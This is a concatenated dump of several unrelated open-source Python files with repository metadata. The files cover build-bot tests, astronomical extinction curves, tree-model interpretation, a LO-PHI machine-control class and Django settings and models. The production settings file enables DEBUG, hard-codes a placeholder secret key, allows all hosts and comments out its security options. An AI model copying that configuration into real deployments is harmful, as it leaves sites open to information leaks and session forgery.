self.computer_model = BuildComputer.objects.create(hostname = "localhost")
self.job = Job.objects.create(slug='cthulhubot-sleep').get_domain_object()
self.job.auto_discovery()
def _mock_resolver(self):
self._original_resolver = urlresolvers.get_resolver
resolver = Mock()
self.prefix = get_script_prefix()
self.mocked_uri = resolver.reverse.return_value="heureka"
urlresolvers.get_resolver = lambda conf: resolver
def _unmock_resolver(self):
urlresolvers.get_resolver = self._original_resolver
def create_assignment(self):
self.assignment_model = create_job_assignment(
computer = self.computer_model,
job = self.job,
project = self.project,
).model
def test_client_created_when_missing(self):
self.assertEquals(0, len(ProjectClient.objects.all()))
self.create_assignment()
self.assertEquals(1, len(ProjectClient.objects.all()))
def test_one_client_per_assigned_computer(self):
self.create_assignment()
new_computer = BuildComputer.objects.create(name="blah", hostname="blah")
create_job_assignment(computer = new_computer, job = self.job, project = self.project)
self.assertEquals(2, len(ProjectClient.objects.all()))
def test_identification_generated_from_pk(self):
self.create_assignment()
self.assert_equals(str(self.assignment_model.pk), self.assignment_model.get_identifier())
def test_identification_raises_value_error_when_not_available(self):
assignment = JobAssignment(project=self.project, computer=self.computer_model, job=self.job.model)
self.assert_raises(ValueError, assignment.get_identifier)
def test_client_password_generated(self):
self.create_assignment()
assert len(ProjectClient.objects.all()[0].password) > 0
def test_client_password_not_update_for_multiple_assignments(self):
self.create_assignment()
password = ProjectClient.objects.all()[0].password
self.create_assignment()
self.assert_equals(password, ProjectClient.objects.all()[0].password)
def tearDown(self):
self._unmock_resolver()
super(TestCreation, self).tearDown()
class TestAssignment(UnitTestCase):
def setUp(self):
super(TestAssignment, self).setUp()
register_mock_jobs_and_commands()
self.computer = MockBuildComputer()
self.computer.adapter = Mock()
self.job = MultipleEchoJob()
self.job.model = MockJob()
self.job.model.get_domain_object = Mock()
self.job.model.get_domain_object.return_value = self.job
self.project = MockProject()
self.assignment_model = JobAssignment(pk=1, project=self.project, computer=self.computer, job=self.job.model)
self.assignment = Assignment(model=self.assignment_model)
self._mock_resolver()
def _mock_resolver(self):
self._original_resolver = urlresolvers.get_resolver
resolver = Mock()
self.prefix = get_script_prefix()
self.mocked_uri = resolver.reverse.return_value="heureka"
urlresolvers.get_resolver = lambda conf: resolver
def _unmock_resolver(self):
urlresolvers.get_resolver = self._original_resolver
self._original_resolver = None
def test_job_mocked_properly(self):
self.assert_equals(self.job, self.assignment.job)
def test_url_retrieving(self):
self.assert_equals(self.prefix+self.mocked_uri, self.assignment.get_absolute_url())
def test_configuration_to_factory_propagated_properly(self):
self.assignment.model.config = dumps({
"commands" : [{}, {}, {}],
})
self.assert_equals(["echo", "first"], self.assignment.get_factory().steps[0][1]['command'])
def test_factory_generated_even_when_parameters_not_given(self):
self.assignment.model.config = dumps({
"commands" : [{'command' : 'cthulhubot-test-helper-echo'}, {}, {}],
})
self.assert_equals(["echo", "first"], self.assignment.get_factory().steps[0][1]['command'])
def test_error_raised_when_command_identifier_not_given_for_parameters(self):
self.assignment.model.config = dumps({
"commands" : [
{
'parameters' : {
'what' : 'first'
}
},
{},
{}
],
})
self.assert_raises(ValueError, self.assignment.get_factory)
def test_error_raised_when_bad_command_identifier_given(self):
self.assignment.model.config = dumps({
"commands" : [
{
'command' : 'xxx-bad-command-identifier-for-this-position',
},
{},
{}
],
})
self.assert_raises(ValueError, self.assignment.get_factory)
def tearDown(self):
super(TestAssignment, self).tearDown()
self._unmock_resolver()
class TestAssignmentUpgrades(UnitTestCase):
def setUp(self):
super(TestAssignmentUpgrades, self).setUp()
register_mock_jobs_and_commands()
self.computer = MockBuildComputer()
self.computer.adapter = Mock()
self.job = MultipleEchoJob()
self.job.model = MockJob()
self.job.model.get_domain_object = Mock()
self.job.model.get_domain_object.return_value = self.job
self.project = MockProject()
self.assignment_model = JobAssignment(pk=1, project=self.project, computer=self.computer, job=self.job.model)
self.assignment = Assignment(model=self.assignment_model)
def test_initial_config_version_is_zero(self):
self.assert_equals(0, self.assignment.configuration_version)
def test_initial_job_version_is_zero(self):
self.assert_equals(0, self.assignment.job_version)
def test_upgrading_job_do_not_touch_assignment_configuration(self):
self.assert_equals(0, self.assignment.configuration_version)
def test_upgrades_affects_job_version(self):
self.job.upgrades = [
lambda x: x,
lambda x: x,
]
self.assert_equals(2, self.assignment.job_version)
class TestResults(DatabaseTestCase):
def setUp(self):
super(TestResults, self).setUp()
self._mock_resolver()
self.db = get_database_connection()
self.project_name = u"project"
self.project = Project(name=self.project_name, tracker_uri="http://example.com", repository_uri="/tmp/project")
self.buildmaster = Buildmaster(project=self.project, buildmaster_port=0, webstatus_port=1)
self.computer = BuildComputer(hostname="localhost")
self.job = Job(slug='cthulhubot-sleep').get_domain_object()
self.assignment = JobAssignment(
job = self.job.model,
project = self.project,
computer = self.computer,
).get_domain_object()
self.client = ProjectClient(project=self.project, computer=self.computer)
def _mock_resolver(self):
self._original_resolver = urlresolvers.get_resolver
resolver = Mock()
self.prefix = get_script_prefix()
self.mocked_uri = resolver.reverse.return_value="heureka"
urlresolvers.get_resolver = lambda conf: resolver
def _unmock_resolver(self):
urlresolvers.get_resolver = self._original_resolver
def insert_build(self, time_end=False, time_start=False):
if not time_start:
time_start = datetime(year=2009, month=01, day=01, hour=12, minute=00, second=00)
if time_end is False:
time_end = datetime(year=2009, month=01, day=01, hour=12, minute=00, second=01)
build = {
'builder' : str(self.assignment.get_identifier()),
'slaves' : [self.client.get_name()],
'number' : 1,
'time_start' : time_start,
'time_end' : time_end,
'steps' : [],
}
self.db.builds.insert(build)
return build
def insert_step(self, build, result=False, successful=False, time_end=False, time_start=False):
if result is False:
result = FAILURE
if time_start is False:
time_start = datetime(year=2009, month=01, day=01, hour=12, minute=00, second=00)
if time_end is False:
time_end = datetime(year=2009, month=01, day=01, hour=12, minute=00, second=01)
step = {
'time_start' : time_start,
'time_end' : time_end,
'stdout' : '',
'stderr' : '',
'headers' : '',
'successful' : successful,
'result' : result,
}
self.db.steps.insert(step)
build['steps'].append(step)
self.db.builds.save(build)
return step
def test_build_results_before_first_run(self):
self.assert_equals(u"No result yet", self.assignment.get_last_build_status())
def test_build_results_before_first_run_ended(self):
self.insert_build(time_end=None)
self.assert_equals(u"No result yet", self.assignment.get_last_build_status())
def test_failed_result(self):
build = self.insert_build(time_end=datetime(year=2009, month=01, day=01, hour=12, minute=00, second=01))
self.insert_step(build)
self.assert_equals(u"Failure", self.assignment.get_last_build_status())
def test_build_retrieved(self):
build = self.insert_build()
self.assert_equals(build, self.assignment.get_builds()[0])
def test_failure_before_success_is_still_fails(self):
build = self.insert_build()
self.insert_step(build)
self.insert_step(build, result=SUCCESS)
self.assert_equals(u"Failure", self.assignment.get_last_build_status())
def test_simple_success(self):
build = self.insert_build()
self.insert_step(build, result=SUCCESS)
self.assert_equals(u"Success", self.assignment.get_last_build_status())
def test_last_finished_build_used_when_last_is_not_finished_yet(self):
build = self.insert_build(time_end=datetime(year=2009, month=01, day=01, hour=12, minute=00, second=01))
self.insert_step(build, result=SUCCESS)
build = self.insert_build(time_start=datetime(year=2009, month=01, day=01, hour=13, minute=00, second=00), time_end=None)
self.insert_step(build, result=FAILURE, time_start = datetime(year=2009, month=01, day=01, hour=13, minute=00, second=00), time_end=datetime(year=2009, month=01, day=01, hour=13, minute=00, second=01))
self.insert_step(build, result=None, time_end=None, time_start=datetime(year=2009, month=01, day=01, hour=13, minute=00, second=01))
self.assert_equals(u"Success", self.assignment.get_last_build_status())
|
centrumholdings/cthulhubot
|
tests/unit_project/tests/test_assignment.py
|
Python
|
bsd-3-clause
| 14,108
|
import re
import os, os.path
import numpy
#A / E(B-v)
avebv= {}
avebvsf= {}
def _read_extCurves():
"""Read the extinction curves files in extCurves"""
extFile= open(os.path.join(os.path.dirname(os.path.realpath(__file__)),
'extCurves','extinction.tbl'),'r')
global avebv
global avebvsf
for line in extFile:
if line[0] == '\\': continue
if line[0] == '|': continue
vals= re.split('\s\s+',line)
avebv[vals[0].strip()]= float(vals[4])
avebvsf[vals[0].strip()]= float(vals[2])
# Add filters from Schlafly & Finkbeiner
extFile= open(os.path.join(os.path.dirname(os.path.realpath(__file__)),
'extCurves','apj398709t6_ascii.txt'),'r')
cnt= 0
for line in extFile:
cnt+= 1
if cnt < 6: continue
if cnt > 49: break
vals= line.split()
# Each line has 2 filters
filter1= '%s %s' % (vals[0],vals[1])
if not filter1 in avebv:
avebv[filter1]= numpy.nan
avebvsf[filter1]= float(vals[4])
filter2= '%s %s' % (vals[7],vals[8])
if not filter2 in avebv:
avebv[filter2]= numpy.nan
avebvsf[filter2]= float(vals[11])
_read_extCurves()
def aebv(filter,sf10=True):
"""
NAME:
aebv
PURPOSE:
return A_filter / E(B-V), necessary to turn SFD E(B-V) into total extinctions
INPUT:
filter - filter to use (e.g., '2MASS Ks')
sf10= (True) if True, use the values from Schlafly & Finkbeiner 2010, which use an updated extinction law, source spectrum, and recalibrated SFD map
OUTPUT:
A_filter / E(B-V)
HISTORY:
2013-11-24 - Written - Bovy (IAS)
"""
if sf10:
if not filter in avebvsf:
raise ValueError("Requested filter is not supported")
return avebvsf[filter]
else:
if not filter in avebv:
raise ValueError("Requested filter is not supported")
return avebv[filter]
|
jobovy/mwdust
|
mwdust/util/extCurves.py
|
Python
|
bsd-3-clause
| 2,028
|
# -*- coding: utf-8 -*-
import numpy as np
import sklearn
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier, RandomForestRegressor, ExtraTreesRegressor
from sklearn.tree import DecisionTreeRegressor, DecisionTreeClassifier, _tree
from distutils.version import LooseVersion
if LooseVersion(sklearn.__version__) < LooseVersion("0.17"):
raise Exception("treeinterpreter requires scikit-learn 0.17 or later")
def _get_tree_paths(tree, node_id, depth=0):
"""
Returns all paths through the tree as list of node_ids
"""
if node_id == _tree.TREE_LEAF:
raise ValueError("Invalid node_id %s" % _tree.TREE_LEAF)
left_child = tree.children_left[node_id]
right_child = tree.children_right[node_id]
if left_child != _tree.TREE_LEAF:
left_paths = _get_tree_paths(tree, left_child, depth=depth + 1)
right_paths = _get_tree_paths(tree, right_child, depth=depth + 1)
for path in left_paths:
path.append(node_id)
for path in right_paths:
path.append(node_id)
paths = left_paths + right_paths
else:
paths = [[node_id]]
return paths
def _predict_tree(model, X, joint_contribution=False):
"""
For a given DecisionTreeRegressor, DecisionTreeClassifier,
ExtraTreeRegressor, or ExtraTreeClassifier,
returns a triple of [prediction, bias and feature_contributions], such
that prediction ≈ bias + feature_contributions.
"""
leaves = model.apply(X)
paths = _get_tree_paths(model.tree_, 0)
for path in paths:
path.reverse()
leaf_to_path = {}
#map leaves to paths
for path in paths:
leaf_to_path[path[-1]] = path
# remove the single-dimensional inner arrays
values = model.tree_.value.squeeze(axis=1)
# reshape if squeezed into a single float
if len(values.shape) == 0:
values = np.array([values])
if isinstance(model, DecisionTreeRegressor):
# we require the values to be the same shape as the biases
values = values.squeeze(axis=1)
biases = np.full(X.shape[0], values[paths[0][0]])
line_shape = X.shape[1]
elif isinstance(model, DecisionTreeClassifier):
# scikit stores category counts, we turn them into probabilities
normalizer = values.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
values /= normalizer
biases = np.tile(values[paths[0][0]], (X.shape[0], 1))
line_shape = (X.shape[1], model.n_classes_)
direct_prediction = values[leaves]
#make into python list, accessing values will be faster
values_list = list(values)
feature_index = list(model.tree_.feature)
contributions = []
if joint_contribution:
for row, leaf in enumerate(leaves):
path = leaf_to_path[leaf]
path_features = set()
contributions.append({})
for i in range(len(path) - 1):
path_features.add(feature_index[path[i]])
contrib = values_list[path[i+1]] - \
values_list[path[i]]
#path_features.sort()
contributions[row][tuple(sorted(path_features))] = \
contributions[row].get(tuple(sorted(path_features)), 0) + contrib
return direct_prediction, biases, contributions
else:
unique_leaves = np.unique(leaves)
unique_contributions = {}
for row, leaf in enumerate(unique_leaves):
for path in paths:
if leaf == path[-1]:
break
contribs = np.zeros(line_shape)
for i in range(len(path) - 1):
contrib = values_list[path[i+1]] - \
values_list[path[i]]
contribs[feature_index[path[i]]] += contrib
unique_contributions[leaf] = contribs
for row, leaf in enumerate(leaves):
contributions.append(unique_contributions[leaf])
return direct_prediction, biases, np.array(contributions)
def _iterative_mean(iter, current_mean, x):
"""
Iteratively calculates mean using
http://www.heikohoffmann.de/htmlthesis/node134.html
:param iter: non-negative integer, iteration
:param current_mean: numpy array, current value of mean
:param x: numpy array, new value to be added to mean
:return: numpy array, updated mean
"""
return current_mean + ((x - current_mean) / (iter + 1))
def _predict_forest(model, X, joint_contribution=False):
"""
For a given RandomForestRegressor, RandomForestClassifier,
ExtraTreesRegressor, or ExtraTreesClassifier returns a triple of
[prediction, bias and feature_contributions], such that prediction ≈ bias +
feature_contributions.
"""
if joint_contribution:
biases = []
contributions = []
predictions = []
for tree in model.estimators_:
pred, bias, contribution = _predict_tree(tree, X, joint_contribution=joint_contribution)
biases.append(bias)
contributions.append(contribution)
predictions.append(pred)
total_contributions = []
for i in range(len(X)):
contr = {}
for j, dct in enumerate(contributions):
for k in set(dct[i]).union(set(contr.keys())):
contr[k] = (contr.get(k, 0)*j + dct[i].get(k,0) ) / (j+1)
total_contributions.append(contr)
for i, item in enumerate(contribution):
total_contributions[i]
sm = sum([v for v in contribution[i].values()])
return (np.mean(predictions, axis=0), np.mean(biases, axis=0),
total_contributions)
else:
mean_pred = None
mean_bias = None
mean_contribution = None
for i, tree in enumerate(model.estimators_):
pred, bias, contribution = _predict_tree(tree, X)
if i < 1: # first iteration
mean_bias = bias
mean_contribution = contribution
mean_pred = pred
else:
mean_bias = _iterative_mean(i, mean_bias, bias)
mean_contribution = _iterative_mean(i, mean_contribution, contribution)
mean_pred = _iterative_mean(i, mean_pred, pred)
return mean_pred, mean_bias, mean_contribution
def predict(model, X, joint_contribution=False):
""" Returns a triple (prediction, bias, feature_contributions), such
that prediction ≈ bias + feature_contributions.
Parameters
----------
model : DecisionTreeRegressor, DecisionTreeClassifier,
ExtraTreeRegressor, ExtraTreeClassifier,
RandomForestRegressor, RandomForestClassifier,
ExtraTreesRegressor, ExtraTreesClassifier
Scikit-learn model on which the prediction should be decomposed.
X : array-like, shape = (n_samples, n_features)
Test samples.
joint_contribution : boolean
Specifies if contributions are given individually from each feature,
or jointly over them
Returns
-------
decomposed prediction : triple of
* prediction, shape = (n_samples) for regression and (n_samples, n_classes)
for classification
* bias, shape = (n_samples) for regression and (n_samples, n_classes) for
classification
* contributions, If joint_contribution is False then returns and array of
shape = (n_samples, n_features) for regression or
shape = (n_samples, n_features, n_classes) for classification, denoting
contribution from each feature.
If joint_contribution is True, then shape is array of size n_samples,
where each array element is a dict from a tuple of feature indices to
to a value denoting the contribution from that feature tuple.
"""
# Only single out response variable supported,
if model.n_outputs_ > 1:
raise ValueError("Multilabel classification trees not supported")
if (isinstance(model, DecisionTreeClassifier) or
isinstance(model, DecisionTreeRegressor)):
return _predict_tree(model, X, joint_contribution=joint_contribution)
elif (isinstance(model, RandomForestClassifier) or
isinstance(model, ExtraTreesClassifier) or
isinstance(model, RandomForestRegressor) or
isinstance(model, ExtraTreesRegressor)):
return _predict_forest(model, X, joint_contribution=joint_contribution)
else:
raise ValueError("Wrong model type. Base learner needs to be a "
"DecisionTreeClassifier or DecisionTreeRegressor.")
|
andosa/treeinterpreter
|
treeinterpreter/treeinterpreter.py
|
Python
|
bsd-3-clause
| 8,824
|
"""
Abstract machine class to handle all of the interactions with a virtual
or physical machine.
(c) 2015 Massachusetts Institute of Technology
"""
# Native
import os
import shutil
import socket
import logging
import time
import multiprocessing
logger = logging.getLogger(__name__)
# LO-PHI
from lophi.sensors import Sensor
from lophi.sensors.memory import MemorySensor
from lophi.sensors.disk import DiskSensor
from lophi.sensors.control import ControlSensor
from lophi.sensors.cpu import CPUSensor
from lophi.sensors.network import NetworkSensor
import lophi.network.ping as ping
import lophi.globals as G
class Machine:
"""
Abstract class used to control a machine. Physical, Xen, or otherwise.
"""
ALLOCATED = -1
MACHINE_STATE = G.MACHINE_STATES['UNKNOWN']
DISK_STATE = G.DISK_STATES['UNKNOWN']
def __init__(self, machine_config):
"""
Initialize anything that we need and save our config file.
"""
# Ensure that this class is never initialized
if self.__class__ == Machine:
raise("Abstract class initialized directly!")
# Save our config
self.config = machine_config
# initialize our sensors
self.control = None
self.disk = None
self.memory = None
self.cpu = None
self.network = None
self.pxe_server = None
self.images_map = None
self.MUTEX = multiprocessing.Lock()
def _has_sensor(self,name):
"""
See if a sensor was defined
@return: True if a memory sensor exists, False otherwise
"""
if name not in self.__dict__ or self.__dict__[name] is None:
logger.warning("No %s sensor has been defined for %s"%(name,
self.config.name))
return False
else:
return True
def set_volatility_profile(self, profile_name):
"""
Set the profile of this machine.
In a physical system this will change the pxe image that it restores
from, if one exists.
In a virtual system, this will change which base disk image we use.
@param profile_name: Profile name of system, based on Volatility's
naming scheme.
"""
raise NotImplementedError("ERROR: Unimplemented function.")
def get_volatility_profile(self):
"""
Get the volatility profile of this machine
"""
if "volatility_profile" in self.config.__dict__:
return self.config.volatility_profile
else:
return None
def add_sensors(self,sensor_list):
"""
Given a list of all of our initialized sensors this will try to
assign all of those requested by this machine.
"""
if self.type != G.MACHINE_TYPES.PHYSICAL:
logger.debug("Virtual sensors are automatically added, no need to call add_sesnors.")
return
rtn = []
def add(sensor):
""" Add sensor to machine """
if self.add_sensor(sensor):
rtn.append(sensor)
# Mem
add(sensor_list.get(self.config.memory_sensor))
# CPU
add(sensor_list.get(self.config.cpu_sensor))
# Disk
add(sensor_list.get(self.config.disk_sensor))
# Control
add(sensor_list.get(self.config.control_sensor))
# Network
add(sensor_list.get(self.config.network_sensor))
return rtn
def add_sensor(self,sensor):
"""
Add a sensor to our machine
@param sensor: Sensor class will be detected
"""
if sensor is None:
return False
if sensor.is_assigned():
logger.error("Tried to add sensor (%s) that was already in use to machine (%s)."%(sensor.id,
self.config.name))
from lophi.machine.virtual import VirtualMachine
from lophi.machine.physical import PhysicalMachine
# Make sure it's a sensor being added
if not issubclass(sensor.__class__,Sensor):
logger.error("Must only add sensors which are subclasses of Sensor")
return False
# Ensure sensor and machine match
if isinstance(self,VirtualMachine) and str(sensor.__class__).find("physical") != -1:
logger.error("Tried to add physical sensor to virtual machine.")
return False
if isinstance(self,PhysicalMachine) and str(sensor.__class__).find("virtual") != -1:
logger.error("Tried to add virtual sensor to physical machine.")
return False
if issubclass(sensor.__class__,DiskSensor):
self.disk = sensor
elif issubclass(sensor.__class__,ControlSensor):
self.control = sensor
elif issubclass(sensor.__class__,MemorySensor):
self.memory = sensor
elif issubclass(sensor.__class__,CPUSensor):
self.cpu = sensor
elif issubclass(sensor.__class__,NetworkSensor):
self.network = sensor
else:
logger.error("Sensor type %s is not recognized for virtual machines."%
sensor.__class__)
return False
sensor.set_assigned()
return True
def add_pxe_server(self, pxe_server):
"""
Add a PXE server to this machine for resetting machine state.
@param pxe_server: PXE Server object
"""
from lophi.machine.physical import PhysicalMachine
if not isinstance(self,PhysicalMachine):
logger.warn("Tried to add a PXE server a non-physical machine. (%s/%s)"%(self.config.name,self.__class__))
return False
self.pxe_server = pxe_server
# Set our profile so PXE can know what to revert from
self.set_volatility_profile(self.config.volatility_profile)
return True
def add_image_map(self, images_map):
"""
Add a mapping of profile names to disk images (Virtual or physical)
Assumed that the map is only for this machine type
@param images_map: Profile -> Image dict. (For Physical this is the
PXE name, for Virtual this is an actual filename)
"""
logger.debug("Added profile to image map. (%s)"%self.config.name)
self.images_map = images_map
"""
Actuation Functions
"""
def keypress_send(self, keypresses):
"""
Given a list of keypress instructions will emulate them on the SUT.
@param keypresses: list of commands returned from a
KeypressGenerator to send to keyboard emulator
"""
# Check for sensor
if not self._has_sensor("control"):
return
self.control.keypress_send(keypresses)
def keypress_get_generator(self):
"""
Return a generator to convert scripts into a language this sensor
understands
@return: KeypressGeneratorPhysical or KeypressGeneratorVirtual
"""
# Check for sensor
if not self._has_sensor("control"):
return
return self.control.keypress_get_generator()
def mouse_click(self,x,y,button=None,double_click=False):
"""
This will move the mouse the specified (X,Y) coordinate and click
"""
if not self._has_sensor("control"):
return
return self.control.mouse_click(self,x,y,button,double_click)
"""
Memory Functions
"""
def memory_read(self, addr, length):
"""
Read physical memory
@param addr: Address to start reading from
@param length: How much memory to read
"""
# Check for sensor
if not self._has_sensor("memory"):
return None
try:
data = self.memory.read(addr,length)
return data
except:
logger.error("Memory read failed. (Addr: 0x%x, Len: %d)"%(addr,length))
G.print_traceback()
return None
def memory_write(self, addr, data):
"""
Write physical memory
@param addr: Address to start writing to
@param data: Data to be written
"""
# Check for sensor
if not self._has_sensor("memory"):
return False
return self.memory.write(addr,data)
def memory_get_size(self):
"""
Get the memory size of our machine
"""
raise NotImplementedError("ERROR: Unimplemented function.")
def memory_dump(self,filename):
"""
Dump the memory of the machine to the given filename
WARNING: The current implementation reads the entire image into
memory first.
@param filename: Filename to dump a memory image to
"""
try:
f = open(filename,"w+")
except:
logger.error("Could not create %s"%filename)
return False
total_size = self.memory_get_size()
offset = 0
from lophi.sensors.memory import CACHE_CHUNK
rtn = True
while offset < total_size:
memory = self.memory_read(offset, min(CACHE_CHUNK,total_size-offset))
if memory is None:
logger.error("Memory dump failed!")
rtn = False
break
f.write(memory)
offset += CACHE_CHUNK
f.close()
return rtn
"""
Power Functions
"""
def power_on(self):
"""
Power on the machine
"""
# Check for sensor
if not self._has_sensor("control"):
return
logger.debug("Powering on machine. (%s)"%self.config.name)
if self.power_status() != G.SENSOR_CONTROL.POWER_STATUS.ON:
rtn = self.control.power_on()
while rtn and self.power_status() != G.SENSOR_CONTROL.POWER_STATUS.ON:
pass
return rtn
else:
return True
def power_shutdown(self):
"""
Nice shutdown of the VM
"""
# Check for sensor
if not self._has_sensor("control"):
return
logger.debug("Shutting down machine. (%s)"%self.config.name)
return self.control.power_shutdown()
# Update state variable
self.MACHINE_STATE = G.MACHINE_STATES['OFF']
def power_off(self):
"""
Hard shutdown the machine
"""
# Check for sensor
if not self._has_sensor("control"):
return
logger.debug("Powering off machine. (%s)"%self.config.name)
if self.power_status() == G.SENSOR_CONTROL.POWER_STATUS.ON:
rtn = self.control.power_off()
start = time.time()
while rtn and self.power_status() != G.SENSOR_CONTROL.POWER_STATUS.OFF:
time.sleep(1)
if time.time()-start > 10:
logger.error("Machine did not power off after 10 s. Trying again.")
rtn = self.control.power_off()
pass
return rtn
else:
return True
def power_reset(self):
"""
Reset the power on the machine
"""
# Check for sensor
if not self._has_sensor("control"):
return
logger.debug("Resetting machine. (%s)"%self.config.name)
return self.control.power_reset()
def power_reboot(self):
"""
Soft reboot the machine
"""
# Check for sensor
if not self._has_sensor("control"):
return
logger.debug("Rebooting machine. (%s)"%self.config.name)
return self.control.power_reboot()
def power_status(self):
"""
Get the power status of the machine.
@return: ON, OFF, UNKNOWN
"""
# Check for sensor
if not self._has_sensor("control"):
return
status = self.control.power_status()
logger.debug("Getting power status of machine. (%s/%s)"%(self.config.name,status))
return status
"""
Machine Control Functions
"""
def machine_create(self, paused=False):
"""
configure a new machine from the specified config file.
"""
raise NotImplementedError("ERROR: Unimplemented function.")
def machine_pause(self):
"""
Pause a machine
"""
raise NotImplementedError("ERROR: Unimplemented function.")
def machine_resume(self):
"""
Resume a paused machine
"""
raise NotImplementedError("ERROR: Unimplemented function.")
"""
Snapshot Functions
"""
def machine_save(self):
"""
Suspends machine and saves state to a file.
"""
raise NotImplementedError("ERROR: Unimplemented function.")
def machine_restore(self, paused=False):
"""
Restore a machine from our saved state and start it
"""
raise NotImplementedError("ERROR: Unimplemented function.")
def machine_snapshot(self):
"""
Takes a snapshot of the machine and freezes it temporarily.
"""
raise NotImplementedError("ERROR: Unimplemented function.")
def machine_snapshot_restore(self):
"""
Restore a machine from our snapshotted state and start it
"""
raise NotImplementedError("ERROR: Unimplemented function.")
def machine_reset(self):
"""
Reset the machine back to the original state of the snapshot
"""
# Check for sensor
if not self._has_sensor("control"):
return
# Ensure that our machine is pwered down
if self.control.power_status() != G.SENSOR_CONTROL.POWER_STATUS.OFF:
logger.debug("Powering down machine...")
self.control.power_off()
# Revert our disk
logger.debug("Reverting disk...")
return self.disk_revert()
"""
Disk Functions
"""
def disk_revert(self):
"""
Overwrite the disk with a backup of our most recent snapshot
"""
raise NotImplementedError("ERROR: Unimplemented function.")
def disk_get_packet(self):
"""
Get the next DiskSensorPacket off the wire.
@return: DiskSensorPacket
"""
return self.disk.get_disk_packet()
"""
Network Functions
"""
def network_get_ip(self):
"""
Looks up IP address from our DHCP server
@return: ASCII IP address or None
"""
raise NotImplementedError("ERROR: Unimplemented function.")
def network_get_status(self):
"""
Get the network status of this machine
Returns True if machine is up, and False otherwise
@return: True for UP, False for DOWN
"""
ip = self.network_get_ip()
if ip is None:
logger.debug("Cannot get net status -- don't know this machine's IP!")
return False
# Use ping to determine if the machine is up
logger.debug("Pinging %s..."%ip)
resp = ping.echo(ip, timeout=1)
if resp:
return True
else:
return False
def network_read(self):
"""
Read a network packet from our network sensor
@return: (timestamp,packet) tuple for the next network packet on
the wire.
"""
# Check for sensor
if not self._has_sensor("network"):
return None
return self.network.read()
def network_write(self,data):
"""
Write a raw network packet to the interface
@param data: Raw network packet
"""
# Check for sensor
if not self._has_sensor("network"):
return None
return self.network.write(data)
"""
Miscellaneous Functions
"""
def screenshot(self,filename,vol_uri=None):
"""
Screenshot the display of the machine and save it to a file.
@param filename: Filename to save screenshot data to.
@param vol_uri: Just here to be compatible with Physical
"""
raise NotImplementedError("ERROR: Unimplemented function.")
# Useful debug type stuff
def __str__(self):
"""
Just output a nice pretty string of our params
"""
rtn = "[%s]\n" % self.config.name
rtn += " ALLOCATED=%s\n" % (self.ALLOCATED)
rtn += " STATE=%s\n" % (self.MACHINE_STATE)
rtn += " DISK_STATE=%s\n" % (self.DISK_STATE)
rtn += " MACHINE_TYPE=%s\n" % (self.type)
for k in self.config.__dict__.keys():
if k is not "name":
rtn += " %s=%s\n" % (k, self.config.__dict__[k])
return rtn
|
mit-ll/LO-PHI
|
python-lophi/lophi/machine/__init__.py
|
Python
|
bsd-3-clause
| 18,193
|
# -*- coding: utf-8 -*-
'''
Production Configurations
- Use djangosecure
- Use Amazon's S3 for storing static files and uploaded media
- Use sendgrid to send emails
- Use MEMCACHIER on Heroku
'''
from configurations import values
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
try:
from S3 import CallingFormat
AWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN
except ImportError:
# TODO: Fix this where even if in Dev this class is called.
pass
from .common import Common
class Production(Common):
DEBUG = True
# INSTALLED_APPS
INSTALLED_APPS = Common.INSTALLED_APPS
# END INSTALLED_APPS
# SECRET KEY
SECRET_KEY = "Change me" # values.SecretValue()
# END SECRET KEY
# django-secure
# INSTALLED_APPS += ("djangosecure", )
# set this to 60 seconds and then to 518400 when you can prove it works
# SECURE_HSTS_SECONDS = 60
# SECURE_HSTS_INCLUDE_SUBDOMAINS = values.BooleanValue(True)
# SECURE_FRAME_DENY = values.BooleanValue(True)
# SECURE_CONTENT_TYPE_NOSNIFF = values.BooleanValue(True)
# SECURE_BROWSER_XSS_FILTER = values.BooleanValue(True)
# SESSION_COOKIE_SECURE = values.BooleanValue(False)
# SESSION_COOKIE_HTTPONLY = values.BooleanValue(True)
# SECURE_SSL_REDIRECT = values.BooleanValue(True)
# end django-secure
# SITE CONFIGURATION
# Hosts/domain names that are valid for this site
# See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
ALLOWED_HOSTS = ["*"]
# END SITE CONFIGURATION
INSTALLED_APPS += ("gunicorn", )
# CACHING
# Only do this here because thanks to django-pylibmc-sasl and pylibmc
# memcacheify is painful to install on windows.
try:
# See: https://github.com/rdegges/django-heroku-memcacheify
from memcacheify import memcacheify
CACHES = memcacheify()
except ImportError:
CACHES = values.CacheURLValue(default="memcached://127.0.0.1:11211")
# END CACHING
# Your production stuff: Below this line define 3rd party library settings
|
garry-cairns/correspondence
|
api/correspondence/config/production.py
|
Python
|
bsd-3-clause
| 2,091
|
from django.utils.translation import ugettext_lazy as _
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
PROPERTY_LABELS = (
('home', _('home')),
('work', _('work')),
('other', _('other')),
)
IM_SERVICES = (
('google', _('Google Talk')),
('aim', _('AIM')),
('yahoo', _('Yahoo')),
('msn', _('MSN')),
('icq', _('ICQ')),
('jabber', _('Jabber')),
)
class PrimaryPropertyManager(models.Manager):
def primary(self):
try:
return self.get_queryset().get(is_primary=True)
except ObjectDoesNotExist:
return None
# Base classes
# Every contact property must inherit from either ContactProperty or
# PrimaryPropery
class ContactProperty(models.Model):
class Meta:
abstract = True
def save(self, *args, **kwargs):
self.contact.save()
models.Model.save(self, *args, **kwargs)
class PrimaryProperty(ContactProperty):
is_primary = models.BooleanField(_("primary"), default=False)
objects = PrimaryPropertyManager()
class Meta:
abstract = True
def save(self, *args, **kwargs):
update_primary = kwargs.pop('update_primary', True)
if update_primary:
try:
existing = self.__class__.objects.exclude(pk=self.id) \
.filter(contact=self.contact,
is_primary=True).get()
except ObjectDoesNotExist:
existing = None
if self.is_primary:
if existing is not None:
existing.is_primary = False
existing.save(update_primary=False)
elif existing is None:
self.is_primary = True
super(PrimaryProperty, self).save(*args, **kwargs)
# Mixin classes
# Abstacts out common fields and methods, models can implement this for
# themselves if different.
class LabeledProperty(models.Model):
label = models.CharField(_("label"), max_length=200, choices=PROPERTY_LABELS)
class Meta:
abstract = True
def __unicode__(self):
return u'%s [%s]' % (self.value, LabeledProperty.get_label_display(self))
class NamedProperty(models.Model):
name = models.CharField(_("name"), max_length=200)
class Meta:
abstract = True
def __unicode__(self):
